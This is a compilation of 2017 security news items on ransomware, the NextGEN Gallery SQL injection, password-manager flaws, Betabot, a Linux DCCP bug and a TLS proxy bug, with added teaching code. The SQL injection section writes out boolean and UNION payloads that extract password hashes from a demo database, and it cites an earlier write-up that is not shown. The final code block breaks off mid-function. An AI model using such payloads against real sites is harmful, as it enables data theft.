According to the vendor, the product responds to changes in how people work and protects corporate devices even when they are connected to a network other than the company's, without the use of a virtual private network (VPN).

The gateway acts as a secure entry point to the internet and protects the device regardless of where the user is at the moment or which network they are trying to connect to.

Most companies rely on virtual private networks (VPNs) for remote work, but according to an IDG survey as many as 82% of mobile employees admit that they do not always connect through the VPN. Umbrella is meant to close that gap.

“Umbrella gives users secure access from any location, even without a VPN connection. The company can thus be sure that corporate devices are protected regardless of how and from where employees connect,” says Milan Habrcetl, security expert at Cisco.

Umbrella blocks known and emerging threats on all ports and protocols. It also prevents access to malicious domains, URLs, IP addresses and files before a connection is established or malicious content is downloaded.

Since most threats target endpoints, the vendor argues, it is essential to cover all ports and protocols and build a safety net that covers 100% of traffic.

Umbrella does not place high demands on operations: because everything runs in the cloud, there is no hardware to install and no manual software updates. Companies can reportedly protect all their devices within minutes.

The product draws on existing Cisco tools, including machine-learning models that detect known and emerging threats and block connections to malicious destinations at the DNS and IP level, intelligence from the Talos security team to block malicious URLs at the HTTP/S level, and Advanced Malware Protection (AMP), which identifies malicious files and blocks them in the cloud.

Umbrella can also be integrated with existing systems, allowing users to extend protection to devices and sites outside the corporate perimeter.

Umbrella uses anycast routing, in which every data center announces the same IP address, so requests are transparently sent to the data center that is currently reachable fastest, with automatic failover if one fails.


Android ransomware infections are skyrocketing

1.3.2017 SecurityWorld Viruses
Eset researchers report a record increase in ransomware detections on Android devices in 2016. This type of malicious code locks the device in various ways and demands a ransom from the victim to unlock it; last year it reached the highest number of infection attempts on record.

“Although we saw an overall increase in Android malware detections of roughly 20 percent, ransomware attacks on this platform are growing much faster. The biggest rise was in the first half of 2016, but we certainly would not dare say that this threat will disappear any time soon,” says Eset CTO Juraj Malcho.

The authors of lockscreens (malicious code that locks the display of a mobile device) and crypto-ransomware (malicious code that encrypts the device's contents) spent the past year copying the distribution techniques used by malware families that attack PCs.

They also developed sophisticated methods aimed at Android-specific technologies. At the same time, cybercriminals focused on keeping a low profile by encrypting the malicious code or hiding it deeper inside infected applications.

During 2015, Eset observed that the interest of Android ransomware authors shifted from Eastern Europe to the US and focused on mobile phone users. Last year, however, attackers increasingly targeted the Asian market as well. “We can certainly say that Android ransomware has become a fully fledged global threat,” Malcho adds.


WordPress Plugin With 1 Million Installs Has Critical Flaw

1.2.2017 securityweek Vulnerability

Researchers discovered that NextGEN Gallery, a WordPress image gallery plugin that has more than 1 million active installs, is affected by a critical SQL injection vulnerability.

The flaw, identified by experts at web security firm Sucuri, allows a remote attacker to easily gain access to the targeted website’s database, including sensitive data such as passwords and secret keys.

The SQL injection vulnerability exists because the plugin’s developers have not properly sanitized user input. The issue was addressed last week with the release of version 2.1.79, but there is no mention of it in the changelog.

“This is quite a critical issue,” warned Sucuri vulnerability researcher Slavco Mihajloski. “If you’re using a vulnerable version of this plugin, update as soon as possible!”

According to Mihajloski, there are two different attack scenarios: one where the targeted site uses a NextGEN Basic TagCloud Gallery, and one where users are allowed to submit posts for review.

In the first attack scenario, the attacker can execute SQL queries by modifying the URL of the gallery. In the second scenario, an authenticated attacker can execute malicious code via shortcodes.
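The two scenarios above, like the payloads in the securityaffairs write-up of the same flaw earlier on this page, come down to user-supplied tag names reaching the query text instead of being bound as parameters. The following is an added example, not code from the plugin or from Sucuri: it models the tag-cloud lookup against an in-memory SQLite database with a constructed schema standing in for wp_terms and wp_users, and runs the boolean and UNION payloads against a concatenating version and a parameterised one. The PHP-specific sprintf-directive trick that defeats $wpdb->prepare() is not reproduced, and SQLite uses "--" where the advisory's MySQL payloads use "#" for the trailing comment; the shape of the attack and of the fix is otherwise the same.

```python
import sqlite3


def make_db():
    """Constructed schema and rows standing in for wp_terms and wp_users (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE terms (term_id INTEGER, name TEXT, slug TEXT);
        INSERT INTO terms VALUES (1, 'Landscapes', 'landscapes'),
                                 (2, 'Portraits',  'portraits');
        CREATE TABLE users (user_login TEXT, user_pass TEXT);
        INSERT INTO users VALUES ('admin', '$P$Bexample.phpass.hash.for.demo.only');
    """)
    return conn


def gallery_terms_vulnerable(conn, tags):
    """Tag slugs taken from the URL are quoted by hand and pasted into the SQL text.
    This is the bug class behind the NextGEN flaw: attacker text becomes query syntax,
    so a slug can close the quote, add an OR, or append a UNION."""
    quoted = ",".join("'" + t + "'" for t in tags)
    sql = f"SELECT term_id, name FROM terms WHERE slug IN ({quoted})"
    return conn.execute(sql).fetchall()


def gallery_terms_safe(conn, tags):
    """One placeholder per tag; the driver binds the values as data, never as syntax.
    Generating the placeholder list is the only string building that is safe here."""
    if not tags:
        return []
    placeholders = ",".join("?" for _ in tags)
    sql = f"SELECT term_id, name FROM terms WHERE slug IN ({placeholders})"
    return conn.execute(sql, list(tags)).fetchall()


# Payloads modelled on the "... )) or 1=1#" shape in the advisory, with SQLite comment syntax.
PAYLOAD_BOOLEAN = "x') OR 1=1 --"
PAYLOAD_UNION = "x') UNION SELECT user_login, user_pass FROM users --"

if __name__ == "__main__":
    db = make_db()
    for label, tags in [("benign", ["landscapes"]),
                        ("boolean", [PAYLOAD_BOOLEAN]),
                        ("union", [PAYLOAD_UNION])]:
        print(label, "vulnerable:", gallery_terms_vulnerable(db, tags))
        print(label, "safe:      ", gallery_terms_safe(db, tags))
```

The UNION payload is the one that matches the "passwords and secret keys" warning in both write-ups: once the attacker controls the WHERE clause of a query with a known column count, any table the database user can read is one UNION away. Against the parameterised version the same strings are simply slugs that match nothing.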

There are no reports about the vulnerability being exploited in the wild, but attacks could be launched in the upcoming period considering the large number of potentially vulnerable installations.

This is not the first time researchers have found a serious vulnerability in the NextGEN Gallery plugin. Last year, experts uncovered a remote code execution flaw.

A study conducted last year by RIPS Technologies showed that 8,800 plugins available in the official WordPress plugins directory had been affected by at least one vulnerability. Nearly 2,800 plugins had high-severity flaws and 41 had critical ones.

WordPress continues to be the most targeted content management system (CMS) and attackers have plenty of vulnerabilities to choose from when targeting WordPress websites.

A critical vulnerability patched in WordPress in January has been exploited against a large number of websites, including for defacements and remote code execution, despite WordPress developers not immediately disclosing its existence in an effort to give users enough time to patch their installations.


Popular Android Password Managers Expose Credentials

1.2.2017 securityweek Crime
Popular Android password managers are affected by serious vulnerabilities that can expose user credentials, researchers warned on Tuesday.

TeamSIK, a group of security experts from the Fraunhofer Institute for Secure Information Technology in Darmstadt, Germany, has analyzed nine of the most popular Android password managers available on Google Play.

The research focused on My Passwords from Erkan Molla, Informaticore’s Password Manager, LastPass, Keeper, F-Secure KEY, Dashlane Password Manager, Keepsafe, Avast Passwords, and 1Password, which have between 100,000 and 50 million installs.

While the apps are advertised as being highly secure, they each contained at least one low, medium or high severity vulnerability. TeamSIK has discovered a total of 26 issues, many of which were patched by vendors within one month after being reported. Only Avast has failed to patch some of the security holes.

“The overall results were extremely worrying and revealed that password manager applications, despite their claims, do not provide enough protection mechanisms for the stored passwords and credentials,” researchers said. “Instead, they abuse the users’ confidence and expose them to high risks.”

According to the experts, some of the applications stored the master password in plain text, or exposed encryption keys in the code. In some cases, the users’ stored passwords could have been easily accessed and exfiltrated by a malicious application installed on the device.

Researchers also determined that some of the apps are vulnerable to data residue attacks and clipboard sniffing. Worryingly, many of the flaws they identified can be exploited without needing root permissions.

For example, one of the high severity flaws affected Informaticore’s Password Manager. While the app stored the master password in an encrypted form, the encryption key was found in the app’s code and it was the same for all installations. A similar flaw was also identified in LastPass.
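The flaw described above, as an added illustration that is not TeamSIK's or any vendor's code: a vault that "encrypts" the master password under a key baked into the app (identical on every installation) next to a design that never stores the master password at all and derives keys from it with a per-installation salt. The stream cipher here is an HMAC-SHA256 counter-mode stand-in for AES so the block runs with the standard library only; the key bytes and passwords are constructed.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a key baked into the app binary. Every installation ships
# the same bytes, so anyone who unpacks the APK recovers it with a disassembler.
HARDCODED_APP_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")

PBKDF2_ITERATIONS = 100_000


def _xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Symmetric stream-cipher stand-in: HMAC-SHA256 in counter mode.
    Educational only; a production app would use AES-GCM from the platform."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


# --- Weak design, as described for the affected app: the master password is stored
# encrypted, but under a key that lives in the code and is identical everywhere.
def weak_store_master(master_password: str) -> dict:
    nonce = os.urandom(12)
    return {"nonce": nonce,
            "ciphertext": _xor_stream(HARDCODED_APP_KEY, nonce, master_password.encode())}


def recover_with_key_from_apk(record: dict) -> str:
    """What a malicious app on the device (or anyone with the APK) can do: reuse the shared key."""
    return _xor_stream(HARDCODED_APP_KEY, record["nonce"], record["ciphertext"]).decode()


# --- Hardened design: never store the master password. Derive keys from it with a
# per-installation random salt and keep only a verifier for the unlock check.
def hardened_enroll(master_password: str, iterations: int = PBKDF2_ITERATIONS) -> dict:
    salt = os.urandom(16)
    verifier = hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                                   b"verify" + salt, iterations)
    return {"salt": salt, "iterations": iterations, "verifier": verifier}


def hardened_unlock(master_password: str, record: dict) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                                    b"verify" + record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["verifier"])


def vault_key(master_password: str, record: dict) -> bytes:
    """Separate derivation label so the stored verifier never doubles as the encryption key."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                               b"vault" + record["salt"], record["iterations"])


def encrypt_entry(key: bytes, plaintext: str) -> dict:
    nonce = os.urandom(12)
    return {"nonce": nonce, "ciphertext": _xor_stream(key, nonce, plaintext.encode())}


def decrypt_entry(key: bytes, blob: dict) -> str:
    return _xor_stream(key, blob["nonce"], blob["ciphertext"]).decode()


if __name__ == "__main__":
    weak = weak_store_master("correct horse battery")
    print("weak design, recovered with the key from the APK:", recover_with_key_from_apk(weak))
    enrolled = hardened_enroll("correct horse battery")
    print("hardened unlock, right password:", hardened_unlock("correct horse battery", enrolled))
    print("hardened unlock, wrong password:", hardened_unlock("hunter2", enrolled))
```

In the hardened variant an attacker holding the APK and the on-disk record still has nothing to decrypt with: the salt differs per installation and the key exists only while the user has typed the master password.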

The most popular of the apps, Keeper and Keepsafe, had two medium and one low-medium vulnerabilities, respectively.

TeamSIK’s analysis showed that built-in web browsers and features such as autofill can also introduce security risks.

“We found that, for example, auto-fill functions for applications could be abused to steal the stored secrets from the password manager application using ‘hidden phishing’ attacks. For a better support of auto-filling password forms in web pages, some of the applications provide their own web browsers. These browsers are an additional source of vulnerabilities, such as privacy leakage,” researchers explained.

Technical details have been made available for each of the patched vulnerabilities.


Cybercriminals Use Cracked Builder to Spawn Betabot Variants

1.3.2017 securityweek CyberCrime
Betabot, an old piece of malware that ensnares affected computers into a botnet, is now being distributed by attackers who managed to crack its builder, Sophos security researchers reveal.

The malware previously functioned as a banking information stealing Trojan, then became a password stealing malware, and recently began capitalizing on infected bots to distribute ransomware. Because some miscreants didn’t want to pay the malware’s creators to get a builder, they started using cracked builders to copy the original design without paying for it.

Sophos security researchers performed an in-depth analysis of Betabot version 1.7, which is said to be the most recent version. The malware’s command and control (C&C) server, they say in a report (PDF), features a fairly user-friendly interface which can appeal to cybercriminals who either lack technical knowledge or don’t want to create a botnet framework for themselves.

The Betabot malware package isn’t very expensive, being advertised on the black market for around $120. However, a cracked version of the builder has been circulating, allowing cybercriminals to use the malware without contacting the author and paying for the malicious software kit.

“As Betabot’s intended use is nefarious in nature, the existence of cracked versions of the builder indicates cybercriminals are not only targeting members of the unsuspecting public but are also engaged in activities related to hacking other malware to leverage the work of other malware authors for free. Although this is not unprecedented, the increased availability due to the utilization of a software crack often results in an increase in the malware family’s use by new parties,” the security researchers say.

Sophos’ researchers say that the Betabot authors did apply anti-piracy measures to their malware toolkit to ensure they receive payment when their creation is used by other cybercriminals. In fact, a feature called “proactive defense” packed in the malware is meant to prevent other competing bots or similar tools such as remote access Trojans from installing and potentially hijacking the botnet.

One of the measures used was the complexity of the method for encoding the configuration data inside the bot payload. This data includes, among other things, the URL of the C&C server and the encryption keys used to encrypt and decrypt the data sent to the server. This configuration data is encrypted and saved in the bot, and the complexity of the packaging method makes it difficult for researchers to analyze the threat and for other cybercriminals to encode their own configuration data.

The crack, researchers say, consists of a console-based builder application that has the compiled Betabot template code stored as a bytes array within the data section of the builder application itself. Users can specify custom configuration information that the crack then encrypts and inserts into the included template code at the appropriate position.

Next, the crack repacks the entire PE file in an attempt to further obfuscate the generated bot and avoid detection by antivirus software. The crack allows users to instruct the bot to connect to a specified C&C, and a single configuration data structure offers support for up to 16 individual servers. However, typical Betabot samples only specify one or two servers, researchers say.

Additionally, the cracked builder generates some pseudo random keys that are to be used for the communication with the server. These keys are then encrypted into the bot’s configuration along with the information provided by the user, and a payload executable that can be distributed is generated. The communication keys are also displayed on the screen, so that the user can configure their server to match them.

“The HC128 algorithm is included in the source code in the form of inline x86 assembly code intended for use with the Microsoft Visual Studio Compiler,” the researchers say. Comments in the cracked builder’s code suggest that the author of the crack couldn’t identify the encryption algorithm and simply extracted it.

Sophos’ report also delivers a thorough analysis of the malware’s C&C server and capabilities, including the anti-piracy measures that the Betabot authors packed their creation with. Those interested in the technical details should have a look at the full report, available in PDF format.

“Although the Betabot family has been around for a while, it is still prevalent and used to spread other malware campaigns and harvest site login credentials. The availability of a crack and the simplicity of the C&C web portal make it attractive to cybercriminals to use without putting forth a lot of effort,” the researchers conclude.


Palo Alto Networks Acquires Breach Detection Startup LightCyber

1.3.2017 securityweek Safety
Palo Alto Networks on Tuesday announced that it has acquired breach detection firm LightCyber for $105 million in cash.

The network security company said that LightCyber’s machine learning, behavioral analytics platform will be integrated into Palo Alto’s Next-Generation Security Platform to help customers better detect breaches throughout the entire attack lifecycle.

LightCyber has raised more than $32 million in funding since being founded in 2011.

LightCyber’s platform doesn’t look at a specific packet or field to detect possible malicious activity, but instead detects attacks by identifying suspicious behavior inside the network.

“We look at the behavior. This means that every file access and every protocol could be used as an attack indication - even were it alright under a different context,” Gonen Fink, CEO of LightCyber, explained to SecurityWeek back in March 2013. “What we do is model each computer and user separately, and maintain those models over time. Everything we do is based on history we gather from the network.”

"This technology will complement the existing automated threat prevention capabilities of our platform to help organizations not only improve but also scale their security protections to prevent cyber breaches,” Mark McLaughlin, chairman and CEO of Palo Alto Networks, said in a statement.

The technology integration is expected to be completed by the end of the calendar year, Palo Alto said.

In a 2013 interview with SecurityWeek, LightCyber's Fink told us that his favorite startup (other than his own) was a company called Cyvera. Ironically, Palo Alto Networks also acquired that company in early 2014.

In addition to announcing the acquisition, Palo Alto on Tuesday announced that total revenue for the fiscal second quarter 2017 came in at $422.6 million, compared with total revenue of $334.7 million for the fiscal second quarter 2016, a 26 percent increase year over year. These figures fell short of Wall Street expectations, sending shares of the company (NYSE:PANW) down more than 20 percent in after-hours trading.

"While fiscal second quarter revenue of $423 million was yet another record for the company, we were disappointed that we came in below top-line expectations due to some execution challenges, which we are moving quickly to address," McLaughlin said.


Hackers Breached Non-Classified System at Singapore's Ministry of Defence

1.2.2017 securityweek Hacking
Singapore’s Ministry of Defence (MINDEF) on Tuesday said that hackers managed to breach a military system that handles non-classified information and access personal data, including NRIC numbers, telephone numbers, and dates of birth of roughly 850 servicemen and employees.

The data was stolen from the Ministry’s I-net system (I-net), which provides Internet access for personal use to national servicemen and employees, including those using dedicated I-net computer terminals in MINDEF and Singapore Armed Forces (SAF) camps and premises.

No classified military information is stored on I-net, the Ministry said, noting that classified matters in MINDEF/SAF use a different computer system with "more stringent security features" that are not connected to the Internet.

In June 2016, Singapore said it would cut off Internet access for government work stations within a year for security reasons, a move that surprised many.

After discovering the incident, MINDEF said the affected server was disconnected from I-net.

“Immediate and detailed forensic investigations were conducted on the entire I-net to determine the extent of the breach,” the Ministry said. “As a precaution even though no breach had been detected, all other computer systems within MINDEF/SAF are also being investigated.”

“The real purpose may have been to gain access to official secrets, but this was prevented by the physical separation of I-net from our internal systems,” a statement added.

MINDEF said the Cyber Security Agency and the Government Technology Agency of Singapore have been notified.

In August 2014, Singapore officials announced new measures to strengthen cyber security following attacks on a section of the prime minister's website, as well as the website of the presidential residence.

Singapore is the home city for SecurityWeek’s 2017 Singapore ICS Cyber Security Conference, an event dedicated to serving critical infrastructure and industrial internet stakeholders in the APAC region. With organizational support from Singapore’s Cyber Security Agency, the event will take place April 25-27, 2017 at the Fairmont Singapore.


Linux distributions contain a serious bug. It took 11 years to find it
28.2.2017 Živě.cz Vulnerabilities

Google security researcher Andrey Konovalov has discovered a critical security flaw in the Linux kernel that would allow attackers to gain administrator (root) privileges. It had been present in systems for at least eleven years. Bleeping Computer drew attention to the threat.

The vulnerability, designated CVE-2017-6074, was confirmed in Linux kernels from version 2.6.18, which was released back in September 2006. The serious problems were caused by a flawed implementation of the Datagram Congestion Control Protocol (DCCP), which serves primarily to protect against congestion of the data network.

Konovalov found a way to abuse the DCCP protocol to trigger a so-called double free bug. This is a security flaw that occurs when an application frees the same memory address twice. In targeted cases, the bug allows malicious code to be executed with the highest privileges in the system kernel.

The bug cannot be exploited remotely over the internet. Experts agree, however, that it can be combined with other vulnerabilities, which may ultimately open the door to the target system for hackers.

Already fixed, download the patches

All developers of the individual Linux distributions were duly notified of the threat. The kernels at risk include those compiled with the CONFIG_IP_DCCP option.

Red Hat Linux developers stated that Red Hat Enterprise Linux 5, 6 and 7 and Red Hat Enterprise MRG 2 contain the bug. The corresponding patches have, however, been produced progressively and are already available for download.

The situation is similar for Debian distributions. Security updates are available for Debian 7 Wheezy and Debian 8 Jessie. Patches are also available for Ubuntu 12.04 LTS, Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10.

Of the SUSE Linux distributions, only SUSE Linux Enterprise Server 10 is affected, and updates are available only to customers of the LTSS (Long Term Service Pack Support) program. The kernels of SUSE Linux Enterprise Server 11 SP1 to SP4 and SUSE Linux Enterprise Server 12 SP1 to SP2 are not built with DCCP support.

A working proof-of-concept of the malicious code will be published within a few days. Users therefore have only a limited time to carry out the necessary update of their systems.

We therefore recommend that readers check the availability of updates for their Linux distribution. If your system is vulnerable and no official patch has been released, a simple script that disables loading of the DCCP protocol will help.
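An added audit for the exposure the article describes (not the script the article refers to, nor any distribution's code): it reports whether DCCP is built in, loaded, loadable on demand, or blocked by the modprobe rule of the form `install dccp /bin/true` that the distribution advisories for CVE-2017-6074 recommended. The functions take file contents as text so they can be tested on constructed input; when run directly the block reads the live system's /proc/modules, /boot/config-<release> and /etc/modprobe.d.

```python
import os
import re

DCCP_MODULES = {"dccp", "dccp_ipv4", "dccp_ipv6"}

# Only the advisory form is counted as a mitigation: modprobe runs /bin/true instead
# of loading the module, so an on-demand load triggered by a socket() call fails.
INSTALL_RULE = re.compile(r"^\s*install\s+dccp\s+/bin/(true|false)\b")


def loaded_dccp_modules(proc_modules_text: str) -> set:
    """Module names from /proc/modules (first column) that belong to DCCP."""
    loaded = set()
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] in DCCP_MODULES:
            loaded.add(fields[0])
    return loaded


def dccp_kernel_config(config_text: str) -> str:
    """'y' = built into the kernel, 'm' = loadable module, 'n' = not compiled in."""
    match = re.search(r"^CONFIG_IP_DCCP=([ym])$", config_text, re.MULTILINE)
    return match.group(1) if match else "n"


def dccp_load_blocked(modprobe_conf_text: str) -> bool:
    return any(INSTALL_RULE.match(line) for line in modprobe_conf_text.splitlines())


def assess(proc_modules_text: str, config_text: str, modprobe_conf_text: str) -> dict:
    """Combine the three inputs into one verdict a defender can act on."""
    config = dccp_kernel_config(config_text)
    loaded = loaded_dccp_modules(proc_modules_text)
    blocked = dccp_load_blocked(modprobe_conf_text)
    if config == "n":
        verdict = "not vulnerable: kernel built without CONFIG_IP_DCCP"
    elif config == "y":
        verdict = "exposed: DCCP is built into the kernel; only a patched kernel removes it"
    elif loaded:
        verdict = "exposed: DCCP module already loaded; unload it and add the install rule"
    elif blocked:
        verdict = "mitigated: module loading is blocked by an install rule"
    else:
        verdict = "exposed: module present and loadable on demand"
    return {"config": config, "loaded": sorted(loaded), "blocked": blocked, "verdict": verdict}


def _read(path: str) -> str:
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def assess_live_system() -> dict:
    conf_dir = "/etc/modprobe.d"
    conf_text = ""
    if os.path.isdir(conf_dir):
        for name in sorted(os.listdir(conf_dir)):
            if name.endswith(".conf"):
                conf_text += _read(os.path.join(conf_dir, name)) + "\n"
    return assess(_read("/proc/modules"),
                  _read("/boot/config-" + os.uname().release),
                  conf_text)


if __name__ == "__main__":
    for key, value in assess_live_system().items():
        print(f"{key}: {value}")
```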


Cyber attacks against Austria were carried out by a Turk living in the USA

28.2.2017 Novinky/Bezpečnost Cyber
A Turkish nationalist living in the USA is behind the recent cyber attacks on key institutions in Austria, the website of the newspaper Der Kurier reported, citing Austrian intelligence. According to the paper, however, it will probably not be possible to establish whether Arslan A. acted on his own or in cooperation with the Turkish intelligence service MIT.
In recent months an airport, ministries, the central bank and the parliament have been targeted by hackers in Austria. An anonymous Turkish group claimed responsibility for the attacks, citing Austria's "hostile to Turkey" behaviour as its motive. Vienna had, for example, called for the EU accession negotiations with Ankara to be frozen.

The main suspect, identified as Arslan A., lives with his brother and cousin in a bungalow in the city of Bowling Green in the eastern US state of Kentucky. US authorities are already dealing with the man, and the Austrian judiciary is also investigating him.

He also attacked in other countries
Besides targets in Austria, Arslan A. also attacked servers in Israel, Iraq and the USA itself. His targets also included a server of the Kurdistan Workers' Party (PKK) in Turkey, which is waging an armed struggle for an autonomous Kurdistan. For his attacks he used a network of 600 computers in 150 countries infected with a malicious program.

The series of attacks began last September, when the then-unknown hackers attempted to paralyse the server of Vienna airport. It managed to defend itself, however. A few days later the central bank's server was attacked.

At the end of November the Ministry of Foreign Affairs became a target, but it also repelled the attack. Two days later the hackers focused on the Ministry of Defence, temporarily taking down the Austrian army's website. Most recently, the parliament faced an attack on 5 February this year.


E-mail still entertains cybercriminals after 30 years. Underestimating security does not pay

28.2.2017 Novinky/Bezpečnost Spam
People around the world have been using e-mail communication for more than three decades. And despite the rise of social networks, e-mail remains one of the most widely used communication tools. That is precisely why computer pirates so often target it. Underestimating the security of one's e-mail accounts may therefore not pay off at all.
According to data from the analytics company Radicati Group, there are more than 2.6 billion e-mail users in the world.

Last year alone, an average of 215 billion e-mails flowed through the global computer network every day. And this figure keeps growing. In January, for example, the daily volume of e-mails rose to an average of 269 billion.

Given the high popularity of this communication method, it is quite understandable that computer pirates very often focus on it as well. They regularly target the most widely used services, because this increases their chances of a successful attack.

Most often they send out various fraudulent messages in which they pose as representatives of various companies or organisations. They lure victims, for example, with last-minute loans or discounts on electronics and jewellery. Discount coupons of all kinds are also popular. The link in the e-mail often leads to a fraudulent website offering the coupon after registration. Instead of the coupon, however, the user usually gives away their login credentials or downloads a malicious virus to their computer.

Users should be very wary of such offers in their mailboxes. "The fraudulent website uses the registration and starts sending e-mails to the mailbox regularly. These usually look innocent. They pose, for instance, as congratulations on a non-existent prize or an offer of another game or goods," said David Finger, product manager of the Seznam.cz Email service.

"Warning signs of these e-mails can be broken Czech, a link that has to be clicked for more information, a strange attachment or a garbled address of a well-known website. By displaying a seemingly innocent image in an attachment or a web page, the user can easily load a virus onto their computer. It will either damage the computer or, in the worse case, install a browser add-on that sends sensitive data to the fraudsters, including passwords entered for banking or other services," Finger said.

Spam existed before the internet
Long before the birth of the internet in its present form, an affair took place that can be described as the birth of unsolicited messages, or spam. In May 1978 the salesman Gary Thuerk sent recipients on the Arpanet network a message inviting them to a promotional event for a new computer. The unsolicited mail was in fact the first spam, although the name only came into use fifteen years later.
It was not until 1993 that Usenet network administrator Joel Furr coined the term spam for unsolicited mail. Furr was inspired by his favourite series Monty Python and its sketch about canned meat, which a group of Vikings feasted on and praised in song: "Spam. Spam. Spam. Spam. Spam." Spam is the brand name of a canned pork ham. The name was created by shortening the words sp(ice) and (h)am.
Don't underestimate the password
Finger also pointed out that danger lurks on the internet for users who underestimate the security of their mailboxes, in other words those who use a very weak password. "The password should not be easy to guess. The name of a four-legged pet or 'heslo123' are not passwords," the product manager warned.

A secure password should have at least six characters and should contain digits and ideally both upper- and lower-case letters. A password should, on the other hand, under no circumstances consist of the user's name, simple words (such as "heslo", the Czech word for password) or a mere sequence of digits.

It is precisely for e-mail that the password should be the strongest and ideally also completely unique. Users often use their mailbox to register for other internet services. If a computer pirate obtains the e-mail password, it is usually no problem for them to get into, for example, various social networks, where they can monitor ongoing communication or simply steal the victim's identity.

Social networks and discussion forums
Even though advice on the use of passwords is well known to a large number of users, the vast majority of people still underestimate the importance of a password. And this applies not only to e-mail accounts but also to other internet services, such as various social networks and discussion forums. This is demonstrated by the ranking of the most used passwords compiled last year by the Leaked Source website.

The absolute winner is the numeric combination 123456. According to security experts, people should under no circumstances use it to secure any account, because, given how widespread it is, attackers usually try it first when attacking accounts.

The most used passwords on the internet
Rank Password
1 123456
2 123456789
3 1234
4 12345
5 password
6 12345678
7 1234567
8 123123
9 111111
10 000000
11 qwerty
12 bearshare
13 1111
14 1234567890
15 0000
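The rules given above and the ranking in the table, turned into a password check as an added example (not Seznam.cz's or Leaked Source's code): at least six characters, a digit, not a bare digit sequence, not the user's name, not a simple word with or without trailing digits (which also catches the "heslo123" the product manager named), and not one of the fifteen most used passwords; missing mixed case is reported as a warning because the article calls it ideal rather than mandatory. The word list and user names are constructed; a deployment would load a full breach list.

```python
import re

# The fifteen entries from the Leaked Source ranking reproduced in the article.
COMMON_PASSWORDS = {
    "123456", "123456789", "1234", "12345", "password", "12345678", "1234567",
    "123123", "111111", "000000", "qwerty", "bearshare", "1111", "1234567890", "0000",
}

# Simple words the article names; extend with a dictionary in practice.
SIMPLE_WORDS = {"heslo", "password"}

MIN_LENGTH = 6


def check_password(password: str, username: str = "") -> dict:
    """Apply the article's rules. 'failures' must be fixed; 'warnings' should be."""
    failures, warnings = [], []
    lowered = password.lower()

    if len(password) < MIN_LENGTH:
        failures.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"\d", password):
        failures.append("contains no digit")
    if password.isdigit():
        failures.append("is only a sequence of digits")
    # The article forbids passwords formed from the user's name; containment is the
    # conservative reading (constructed rule, e.g. 'karel2017' for user 'karel').
    if username and username.lower() in lowered:
        failures.append("contains the user name")
    # Strip trailing digits so 'heslo123' is treated like 'heslo'.
    if re.sub(r"\d+$", "", lowered) in SIMPLE_WORDS:
        failures.append("is a simple word, possibly followed by digits")
    if lowered in COMMON_PASSWORDS:
        failures.append("appears in the most-used password list; attackers try these first")
    if not (any(c.islower() for c in password) and any(c.isupper() for c in password)):
        warnings.append("does not mix upper- and lower-case letters")

    return {"ok": not failures, "failures": failures, "warnings": warnings}


if __name__ == "__main__":
    for candidate, user in [("123456", ""), ("heslo123", ""), ("karel2017", "karel"),
                            ("kolo2017", "karel"), ("Tr0ub4dor&3", "karel")]:
        result = check_password(candidate, user)
        state = "OK" if result["ok"] else "REJECT"
        print(f"{candidate!r:16} {state:7} {result['failures'] + result['warnings']}")
```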


TLS Bug in Blue Coat Proxy Breaks Chromebooks, PCs

28.2.2017 securityweek Vulnerability

Products from Symantec-owned Blue Coat and likely other vendors can cause serious problems for devices running the Chrome web browser or Chrome OS due to poor implementation of the TLS 1.3 protocol.

Google warned last week that the use of Blue Coat proxies causes connection problems when Chrome 56 or Chrome OS 56 attempt to connect via TLS 1.3. The tech giant believes the issue affects products running version 6.5 of the Blue Coat SGOS operating system.

An employee of Montgomery County Public Schools in Maryland reported that thousands of the organization’s Chromebooks and PCs had broken down due to the bug. The affected devices had automatically updated to Chrome OS 56 and Chrome 56, respectively, which introduced support for TLS 1.3.

The employee said the organization’s Chromebooks are “stuck in a state of flickering between a login screen and a ‘Network not available’ screen. Occasionally, you can see a SSL_HANDSHAKE_ERROR briefly at the login screen before switching back to the ‘Network not available’ screen.”

Other major education organizations are affected as well, likely because SSL/TLS inspection is common in this sector, Google said.

The company has provided some workarounds and released a Chrome update that disables TLS 1.3. A future version of the web browser will re-enable TLS 1.3; hopefully, firewall and proxy vendors will have addressed the issue by then.
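The article does not say what the proxy got wrong, so this added example (not Google's or Blue Coat's code) shows only the part of TLS 1.3 that changed for anything sitting in the middle of the handshake: the ClientHello's legacy version field still reads 1.2 and the versions actually offered ride in the supported_versions extension (type 43), so an inspecting device that trusts only the legacy field and a parser that follows the specification disagree about what the client offered. The bytes are constructed; 0x0304 is the final RFC 8446 code point (Chrome 56 shipped a draft code point), and the random field is fixed for reproducibility.

```python
import struct

TLS_1_2 = 0x0303
TLS_1_3 = 0x0304              # final RFC 8446 value; drafts used 0x7fXX code points
SUPPORTED_VERSIONS_EXT = 43
HANDSHAKE = 0x16
CLIENT_HELLO = 0x01


def build_client_hello(offered_versions, cipher_suites=(0x1301, 0xC02F)) -> bytes:
    """Build a ClientHello record. A TLS 1.3 client keeps legacy_version at 1.2 and
    puts its real offer in supported_versions; an empty list yields a 1.2-only hello."""
    body = struct.pack("!H", TLS_1_2) + bytes(32)           # legacy_version + random
    body += b"\x00"                                           # empty legacy_session_id
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                                       # compression methods: null
    extensions = b""
    if offered_versions:
        versions = b"".join(struct.pack("!H", v) for v in offered_versions)
        ext_body = bytes([len(versions)]) + versions
        extensions += struct.pack("!HH", SUPPORTED_VERSIONS_EXT, len(ext_body)) + ext_body
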